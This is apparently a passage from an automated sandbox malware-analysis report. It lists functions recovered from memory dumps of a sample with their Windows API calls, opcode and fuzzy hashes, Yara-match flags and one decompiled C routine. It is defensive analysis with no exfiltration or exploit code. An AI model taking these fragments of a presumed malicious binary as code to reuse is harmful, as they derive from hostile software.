                  • GetCurrentThreadId.KERNEL32 ref: 0232B803
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: 2b2ca8f8453713293a20491cec531233cf3c64784bd12323ff2f90bd717650d8
                  • Instruction ID: 3298400a5b6e00e8e47ded1e8a1e1bff17707146a7ee5ff2cfaca941275a17bb
                  • Opcode Fuzzy Hash: 2b2ca8f8453713293a20491cec531233cf3c64784bd12323ff2f90bd717650d8
                  • Instruction Fuzzy Hash: CD5153B49047588FDB10CFA9D588BDEBBF1EF48308F24849AE019A7350C774A849CF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 0232B730
                  • GetCurrentThread.KERNEL32 ref: 0232B76D
                  • GetCurrentProcess.KERNEL32 ref: 0232B7AA
                  • GetCurrentThreadId.KERNEL32 ref: 0232B803
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: 3d8eb261b73c4d664108737a6d44887d61549415ecaa9f86f4836b122acfad51
                  • Instruction ID: 5e428612715ddfd0c790f5c00cd8d2455792ee32715fa1197bab39d48469ff78
                  • Opcode Fuzzy Hash: 3d8eb261b73c4d664108737a6d44887d61549415ecaa9f86f4836b122acfad51
                  • Instruction Fuzzy Hash: AE5122B4904758CFDB10CFA9D588B9EBBF1EF48308F208459E419A7350D774A948CF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                  0x004055c5
                  0x004055cf
                  0x004055d3
                  0x004055e4
                  0x004055e8
                  0x004055ed
                  0x004055f3
                  0x004055f8
                  0x004055fd
                  0x00405602
                  0x00405609
                  0x004055d5
                  0x004055d5
                  0x004055d5
                  0x00405614

                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: EnvironmentStrings$Free
                  • String ID:
                  • API String ID: 3328510275-0
                  • Opcode ID: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                  • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                  • Opcode Fuzzy Hash: c7d29cc3e48e8c5ceae9ca08dcc2d4b1cbf3fa61fc8238b3c289e7606623bc66
                  • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f18a8d7cae11ae58686bd358058f38ec6da5ee5d971866e1fa6d8f62c974c50a
                  • Instruction ID: 661f71bc3de7c024edf26638f296efe694d65ca44dd5fd9e63fe0e62da841274
                  • Opcode Fuzzy Hash: f18a8d7cae11ae58686bd358058f38ec6da5ee5d971866e1fa6d8f62c974c50a
                  • Instruction Fuzzy Hash: FA226078E44205DFDB28DB98D488ABEFBB2FB89310F258555E432A7355C734A881CB71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D5130, Relevance: 1.8, APIs: 1, Instructions: 285windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 051DD29D
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 86cc25898cec9864a2108da6047a0804ac6e7b0f25e29667c645622490e86859
                  • Instruction ID: 7b61be398c5ff80773efcd7bd91be5129da6b508edebb7acb071820b9539b8e3
                  • Opcode Fuzzy Hash: 86cc25898cec9864a2108da6047a0804ac6e7b0f25e29667c645622490e86859
                  • Instruction Fuzzy Hash: 7BC12874A14219DFCB14DFA9D884EADBBB2FF48314F118559E802AB2A1C775EC85CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023293E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0232962E
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 33f6917cfcbc439de8486aff1906c670401171c87301c91b93c649669f8c54d6
                  • Instruction ID: 8786f44aca3d36164810e227de7fc4fd8e3b42b079275acd8a7d3e8d45bfb35c
                  • Opcode Fuzzy Hash: 33f6917cfcbc439de8486aff1906c670401171c87301c91b93c649669f8c54d6
                  • Instruction Fuzzy Hash: 80714570A00B158FD764DF29D05075AB7F6BF88304F108A2ED58ADBA40DB34E84ACF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05381A4C, Relevance: 1.7, APIs: 1, Instructions: 185registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegQueryValueExA.KERNELBASE(00000000,05385F31,00020119,00000000,00000000,?), ref: 053862FF
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: QueryValue
                  • String ID:
                  • API String ID: 3660427363-0
                  • Opcode ID: f60298e454b330e05cd4fe873896d13dc1116a42032c117a803e4e70800b8ff4
                  • Instruction ID: 19d0cd833e8459ca627f4f4ba370fd96020df64a0716ae9820b5227e94eef1f5
                  • Opcode Fuzzy Hash: f60298e454b330e05cd4fe873896d13dc1116a42032c117a803e4e70800b8ff4
                  • Instruction Fuzzy Hash: D6716B70D04318DFDB18DFA9C885BAEBBB1BF58314F148129E819A7351DBB4A845CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232FBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                  Download Yara Rule
                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0232FD0A
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: a5761dc66318afcecd13a8f28ca587471fb4a8a9e91fa8aeb54f0b8545a25785
                  • Instruction ID: 7c378dd2e9257a66829ab37fab2fb262521d102225c9b82e3628ee5f469a38f5
                  • Opcode Fuzzy Hash: a5761dc66318afcecd13a8f28ca587471fb4a8a9e91fa8aeb54f0b8545a25785
                  • Instruction Fuzzy Hash: 9D51BEB1D003189FDF14CFA9D984ADEBBB5FF48304F24852AE819AB614D7749989CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                  Download Yara Rule
                  APIs
                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0232FD0A
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: CreateWindow
                  • String ID:
                  • API String ID: 716092398-0
                  • Opcode ID: eb1872ba518c6fbcd916cf0efdd95b90cd91917837464e6fa1e7081b9017ce31
                  • Instruction ID: 4f86512ea47e9d643750a03308aab126612ef7572371a2feb4c9ef307bfa78af
                  • Opcode Fuzzy Hash: eb1872ba518c6fbcd916cf0efdd95b90cd91917837464e6fa1e7081b9017ce31
                  • Instruction Fuzzy Hash: C541AEB1D003199FDF14CFA9D984ADEBBB5FF48314F24812AE819AB214D7749985CF90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05385FBC, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,?,?), ref: 053860AF
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: a4e7f06d5a54e8ae6ce9db10f9a8a118052c2e1746cb501f5a565b8a9f21ec83
                  • Instruction ID: e993ec08f26b5974500d0a4ce733d59f266eca21fe96584e863c819f4ab04de6
                  • Opcode Fuzzy Hash: a4e7f06d5a54e8ae6ce9db10f9a8a118052c2e1746cb501f5a565b8a9f21ec83
                  • Instruction Fuzzy Hash: AA4175B0C04318DFCB14DFA9C885BAEBBB5BF18304F14812AE818AB340DBB49845CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05381A40, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,?,?), ref: 053860AF
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: 61e03bcd6121b92fb8a5f8544bf3e722b3f06efe1881ac8fefadd3f2f777e044
                  • Instruction ID: f1a0680a8ca799d5a444972817b73db80e586265e4ac931813218a309ff92b99
                  • Opcode Fuzzy Hash: 61e03bcd6121b92fb8a5f8544bf3e722b3f06efe1881ac8fefadd3f2f777e044
                  • Instruction Fuzzy Hash: 2F4165B0D04758DFCB14DFA9C885BAEBBF5BF58304F10812AE819AB340DBB49845CB95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D45F5, Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 051D46B1
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: 1f873ca3f5a019c312409a82521a6992d5cfd8fc151f4a464d22c37fd033eb81
                  • Instruction ID: 27c82dcf37a796d79f27dda64b8ff789283354360d254ea555ec0e3d670e1d81
                  • Opcode Fuzzy Hash: 1f873ca3f5a019c312409a82521a6992d5cfd8fc151f4a464d22c37fd033eb81
                  • Instruction Fuzzy Hash: AD4100B1C04758CFDB24CFA5C8847DDBBB1BF49304F21805AD409AB254DBB5594ACFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                  Download Yara Rule
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 051D46B1
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: df345705b45105ec21aa6272d71b7c4f685b8fc5a4562455bc193deb7922a218
                  • Instruction ID: 09e2073e8f23a09b33155f21b144d105b1fd7285a89cbbb9f7b713754ccd01e7
                  • Opcode Fuzzy Hash: df345705b45105ec21aa6272d71b7c4f685b8fc5a4562455bc193deb7922a218
                  • Instruction Fuzzy Hash: 3941EFB1C04758CBDF24DFA9C884BDEBBB5BF49304F218059D409AB254DBB56945CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05387C3C, Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileA.KERNELBASE(?), ref: 05387D1C
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: 87be6ffb66fdf595599e5bdfe7c15ef3426642745fd4850976cfe3b60f8a4044
                  • Instruction ID: a74ed1d31e9a65408670a89120815b5f2c8bcebd056e14e62ac7fa236d9e4ee3
                  • Opcode Fuzzy Hash: 87be6ffb66fdf595599e5bdfe7c15ef3426642745fd4850976cfe3b60f8a4044
                  • Instruction Fuzzy Hash: 4A4167B0D103588FDB24DFA9C8857AEBBF2FB48304F24852AE815A7344DBB59845CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                  Download Yara Rule
                  APIs
                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 051D2531
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: CallProcWindow
                  • String ID:
                  • API String ID: 2714655100-0
                  • Opcode ID: 52aa87631c6a4e9361d3e7a5a518bb4757153ea2019e1f3e0cc461166bf5a31e
                  • Instruction ID: 6f44b50cef15cc7a1eb2a0474421e16d2c3b34a8848edebaf1bae2908fa70e18
                  • Opcode Fuzzy Hash: 52aa87631c6a4e9361d3e7a5a518bb4757153ea2019e1f3e0cc461166bf5a31e
                  • Instruction Fuzzy Hash: 6141F7B8A00305CFDB14CF99C448EAAFBF6FB88314F15C459D929AB321D774A841CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 05387C48, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileA.KERNELBASE(?), ref: 05387D1C
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: bea1fd3891942ff336d53dd532a4e2456512427f350fc0918beaee09e11af495
                  • Instruction ID: 4a8b9373b9239257ebc2cd44df371fe85712909c2ad899616ececf143d2628bc
                  • Opcode Fuzzy Hash: bea1fd3891942ff336d53dd532a4e2456512427f350fc0918beaee09e11af495
                  • Instruction Fuzzy Hash: 503157B0D107588FDB14DFA9C8847EEBBF2FB48304F248529E815A7344DBB59845CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 053804C8, Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.466724123.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                  Similarity
                  • API ID: DispatchMessage
                  • String ID:
                  • API String ID: 2061451462-0
                  • Opcode ID: 8cf6c0c2f2fe692adb19cff73b0b41e3437a24813efe49c13d06cae92c6393f7
                  • Instruction ID: f533a066cfebc0f74cec37e166bce4ad9bb7b18bcafecdd5bbc58b2983f1ba2d
                  • Opcode Fuzzy Hash: 8cf6c0c2f2fe692adb19cff73b0b41e3437a24813efe49c13d06cae92c6393f7
                  • Instruction Fuzzy Hash: 093198B0A08358CFCB18DFA9D888AEDBBF0BF49314F058099E455AB361C7749948CF20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DB888, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
                  Download Yara Rule
                  APIs
                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051DB957
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: CreateFromIconResource
                  • String ID:
                  • API String ID: 3668623891-0
                  • Opcode ID: 74cf31e7eed2c0e2e242be6381d6f00a5b50de6a736f33d091464c5156e473e6
                  • Instruction ID: 6e985a74ff3e2455eb6a4ee7e3bf08aeee43a7377f4860dc49cf3a4341cf6a0e
                  • Opcode Fuzzy Hash: 74cf31e7eed2c0e2e242be6381d6f00a5b50de6a736f33d091464c5156e473e6
                  • Instruction Fuzzy Hash: ED318DB2908399AFCB01CFA9D844ADEBFF4EF09210F15845AF954A7212C335D954DFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DE6B0, Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,022753E8,00000000,?), ref: 051DE73D
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: f971c2d4d37322566e9ec7fabe4e9305f8f8632f8aa3bac76128f4d96d5e47cd
                  • Instruction ID: e47e0b32fb74fd6877186c620efadf0b8994530c3055c13b9b9796611b175707
                  • Opcode Fuzzy Hash: f971c2d4d37322566e9ec7fabe4e9305f8f8632f8aa3bac76128f4d96d5e47cd
                  • Instruction Fuzzy Hash: 94215CB18043899FDB11CFA5D885BDEBFF8EB09324F14845AE854A7241D378A945CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232BCF8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                  Download Yara Rule
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232BD87
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 37885ec7cb1aa1f783f9fc828499816491a761b22052f0d3b687b113779c047a
                  • Instruction ID: 9d162de5659c40cc62de2dfe60d5e5af7d0698b4e2fa722a89c8c288e82b2c37
                  • Opcode Fuzzy Hash: 37885ec7cb1aa1f783f9fc828499816491a761b22052f0d3b687b113779c047a
                  • Instruction Fuzzy Hash: E121EEB59002589FDB10CFA9E584AEEFBF5EB48314F14841AE958A7310C378A945CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                  Download Yara Rule
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232BD87
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: fecf2665ce53a50899fa3db6183f45e8309ccdb7924c694c9ef518668bf9e7bf
                  • Instruction ID: ccbec3a327771924d868041e3af68b89bc769d1d1965e14305ba7a9d8dc8fcc0
                  • Opcode Fuzzy Hash: fecf2665ce53a50899fa3db6183f45e8309ccdb7924c694c9ef518668bf9e7bf
                  • Instruction Fuzzy Hash: 9E21B0B59002589FDB10CFAAD984ADEFBF9EB48314F14841AE918A7310D378A944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DA4DF, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051DBCBD
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: c34ef5622bc03b8991d9d3d43555869b1cda3d33edbca227f646be867ca6b15a
                  • Instruction ID: 3f2bcb7c33bfc881eef633d74e706d11957b424524da9351066de98b0e91862e
                  • Opcode Fuzzy Hash: c34ef5622bc03b8991d9d3d43555869b1cda3d33edbca227f646be867ca6b15a
                  • Instruction Fuzzy Hash: 541103B6804249DFCB20CF99C985BEEBBF8FB59354F15881AE915A7300C378A5458FA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02328768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,023296A9,00000800,00000000,00000000), ref: 023298BA
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: ee9098c797aee0a9e940e9d770dcb360783c852e6e2a0214f2bc3e3325e44df9
                  • Instruction ID: e987ce02e7a5dc0152f62078a9d2929dedb240927dd0a11f1a712c4c5367734c
                  • Opcode Fuzzy Hash: ee9098c797aee0a9e940e9d770dcb360783c852e6e2a0214f2bc3e3325e44df9
                  • Instruction Fuzzy Hash: 2011F2B69042598BDB10CFAAD444B9EBBF4AB48314F14842EE919B7600C374A949CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02329849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,023296A9,00000800,00000000,00000000), ref: 023298BA
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: LibraryLoad
                  • String ID:
                  • API String ID: 1029625771-0
                  • Opcode ID: ba9b314a1ad500467bbf994e6b2a9470cdf28dc2eab7ab5b3fc50bbb9a8d0d20
                  • Instruction ID: e14d2ff4daf9be6ec4162cc09e97da98efb02d497712af3b534cb8d41e441fcb
                  • Opcode Fuzzy Hash: ba9b314a1ad500467bbf994e6b2a9470cdf28dc2eab7ab5b3fc50bbb9a8d0d20
                  • Instruction Fuzzy Hash: 5E1103B6D042498FDB10CFA9D444BDEBBF4AB88314F14852EE429A7710C374A545CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                  Download Yara Rule
                  APIs
                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051DB957
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: CreateFromIconResource
                  • String ID:
                  • API String ID: 3668623891-0
                  • Opcode ID: 9e7e806a75a71275636c9839ef8713ade0aee601b2d36eecbb7135aca7e82c5c
                  • Instruction ID: 762da0c564155a4ec8b829b303f2d5d57aa000e261a827042e9460a08de65006
                  • Opcode Fuzzy Hash: 9e7e806a75a71275636c9839ef8713ade0aee601b2d36eecbb7135aca7e82c5c
                  • Instruction Fuzzy Hash: 5F1123B18042499FDB10CFAAD844BDEBFF8EB48324F14841AE915A7210C378A954DFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02327EE9, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                  Download Yara Rule
                  APIs
                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02327F5D
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: CallbackDispatcherUser
                  • String ID:
                  • API String ID: 2492992576-0
                  • Opcode ID: f08dbdebcb5447c74a2344ef504a21c4242c56ca733a03702aeb4731512a5812
                  • Instruction ID: ec9a6e6b42319878e8acad6b520da28df2684b6c6bd34aae6da196ba62cfd45a
                  • Opcode Fuzzy Hash: f08dbdebcb5447c74a2344ef504a21c4242c56ca733a03702aeb4731512a5812
                  • Instruction Fuzzy Hash: 9111AFB5808394CEDB11CFA4E4043DEFFF0AB05314F44849ED8A5A7242C778961ACBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,022753E8,00000000,?), ref: 051DE73D
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessagePost
                  • String ID:
                  • API String ID: 410705778-0
                  • Opcode ID: 615ae9735106cfed104c378d5391ea23d969290e03182cc2a371133d6ab18334
                  • Instruction ID: adb4c6fd07b3a22a59324b6fb3d85f4478fc8302f55ca1897a95ffabaf86105d
                  • Opcode Fuzzy Hash: 615ae9735106cfed104c378d5391ea23d969290e03182cc2a371133d6ab18334
                  • Instruction Fuzzy Hash: 7C1113B58003499FDB50CF99C885BEEFBF8FB48324F10841AE954A7240D378A944CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051DBCBD
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 22ffe987e97558db7728b08ffd711e9f47d90c961b8c13b8219fbcde6b9592b8
                  • Instruction ID: c61235d9288e840f4a9748a144b05a9f979850aee5ba8fd4988cf4f5c52e1f1a
                  • Opcode Fuzzy Hash: 22ffe987e97558db7728b08ffd711e9f47d90c961b8c13b8219fbcde6b9592b8
                  • Instruction Fuzzy Hash: 5A11DFB59047489FDB20CF99D488BDEBBF8FB48314F10881AE915A7200C374A944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051D226A,?,00000000,?), ref: 051DC435
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 5728f2753c438c1deaf51266d842de51c8cf2d3bf4c75fc55341aa951889673e
                  • Instruction ID: 1ae849159b847a258ceedaeba90c51ceaa4f172d776701dbf37322d912d0c58b
                  • Opcode Fuzzy Hash: 5728f2753c438c1deaf51266d842de51c8cf2d3bf4c75fc55341aa951889673e
                  • Instruction Fuzzy Hash: 4A11C5B59047499FDB10CF99D444BEEFBF8EB48314F148919E955B7600C3B4A944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051D50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 051DD29D
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 9d9aaf6c8723213dc2b4bb728be67f5912c4a83dd0c950767bf53e480b870690
                  • Instruction ID: 72e6fb662a2604c250ca876d740be3856474248ef6e3a6144fba2a933872a60a
                  • Opcode Fuzzy Hash: 9d9aaf6c8723213dc2b4bb728be67f5912c4a83dd0c950767bf53e480b870690
                  • Instruction Fuzzy Hash: 1A11B0B59047499FDB20DF99D588BDEFBF8EB48314F10841AE915B7200C3B5A944CFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023295C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0232962E
                  Memory Dump Source
                  • Source File: 00000002.00000002.461616983.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 24dd65d4f1a3b7520701eaa4505a1a1720ee7a19ffa2d02abfb559d7c08f10f5
                  • Instruction ID: 89c7500a3be904fff19f45d14acab4871428a98e5c4f5bd98242fdc26f667435
                  • Opcode Fuzzy Hash: 24dd65d4f1a3b7520701eaa4505a1a1720ee7a19ffa2d02abfb559d7c08f10f5
